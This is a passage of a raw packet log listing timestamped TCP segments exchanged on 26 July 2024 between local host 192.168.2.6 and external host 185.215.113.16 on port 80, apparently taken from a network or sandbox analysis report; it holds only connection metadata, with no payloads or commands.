Jul 26, 2024 12:57:05.129525900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.129535913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.129549980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.129564047 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.129570007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.129578114 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.129591942 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.129618883 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.130356073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.130367041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.130382061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.130392075 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.130398035 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.130422115 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.130444050 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.131031990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131042004 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131047010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131057978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131071091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131083012 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.131084919 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131108046 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.131122112 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.131879091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131887913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131905079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131913900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131927967 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.131932020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.131947041 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.131974936 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.132685900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.132697105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.132713079 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.132721901 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.132730007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.132740021 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.132749081 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.132755041 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.132782936 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.132797003 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.133541107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.133550882 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.133563995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.133579016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.133588076 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.133589029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.133599043 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.133627892 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.134326935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.134336948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.134352922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.134362936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.134367943 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.134376049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.134390116 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.134392023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.134408951 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.134428978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.135109901 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.135154009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.180313110 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.180325985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.180331945 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.180535078 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.180932999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.180948973 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.180963993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.180974960 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.181001902 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.181022882 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.181174994 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.181183100 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.181189060 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.181200981 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.181221962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.181340933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.181340933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.181340933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.181999922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182009935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182028055 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182038069 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182044983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.182054996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182065010 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.182065010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182090044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.182106972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.182848930 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182857990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182874918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182883978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182898998 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.182900906 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.182921886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.182934999 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.183747053 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.183758020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.183774948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.183784008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.183795929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.183799028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.183809042 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.183814049 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.183832884 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.183856010 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.184629917 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.184638977 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.184652090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.184669018 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.184669971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.184678078 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.184684038 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.184705973 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.184727907 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.215462923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.215475082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.215492964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.215543032 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.215586901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.215620041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.215662003 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.215760946 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.215781927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.215802908 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.215816975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.216160059 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216170073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216186047 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216195107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216207981 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.216234922 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.216815948 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216825962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216841936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216852903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216865063 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.216866016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216880083 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216887951 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.216890097 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.216905117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.216928959 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.217761040 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.217771053 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.217787027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.217796087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.217813015 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.217820883 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.217843056 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.217855930 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.218621016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.218631983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.218643904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.218658924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.218667984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.218669891 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.218686104 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.218691111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.218717098 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.218746901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.219517946 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.219528913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.219546080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.219556093 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.219558954 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.219572067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.219578028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.219594002 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.219618082 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.220400095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.220411062 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.220427036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.220436096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.220448971 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.220453978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.220463037 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.220463037 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.220500946 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.220514059 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.221302986 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.221312046 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.221328020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.221338034 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.221344948 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.221354961 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.221362114 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.221364975 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.221385956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.221395969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.222210884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.222223997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.222239971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.222249031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.222254038 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.222264051 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.222275972 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.222296953 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.223076105 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223086119 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223102093 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223114014 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.223114014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223125935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223135948 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.223139048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223155975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.223177910 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.223803997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223814011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223831892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223840952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223859072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223867893 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.223968029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.224642038 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224653006 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224668980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224679947 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224694967 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.224695921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224706888 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224721909 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.224721909 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.224736929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.224756956 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.235831022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.235896111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236068964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236079931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236109018 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236124992 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236301899 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236311913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236318111 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236324072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236361027 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236392021 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236797094 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236807108 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236824036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.236845970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236870050 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.236870050 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.272180080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272185087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272191048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272259951 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.272265911 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272279978 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272289991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272315979 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.272330046 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.272695065 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272735119 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272746086 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.272749901 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.272772074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.272798061 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.273180962 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273191929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273211002 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273221970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273236990 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273237944 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.273247957 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.273252964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273276091 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.273296118 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.273936987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273947001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273967028 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273977041 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.273993969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274000883 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.274000883 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.274005890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274039984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.274055004 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.274811029 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274821043 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274840117 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274849892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274864912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.274864912 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274871111 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.274895906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.274916887 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.275717020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.275727987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.275759935 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.275779963 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.276743889 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.276791096 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.276814938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.276854992 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.276988983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.277000904 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.277034044 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.277293921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.277304888 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.277311087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.277352095 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.306843042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307205915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307209969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.307220936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307230949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307245970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307260036 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307435989 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307466030 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.307508945 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.307555914 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307702065 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.307730913 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307740927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307746887 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.307785034 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.308229923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.308238983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.308259010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.308268070 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.308278084 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.308285952 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.308295965 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.308306932 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.308329105 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.308379889 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:05.309190989 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:05.309201002 CEST	80	60778	185.215.113.16	192.168.2.6
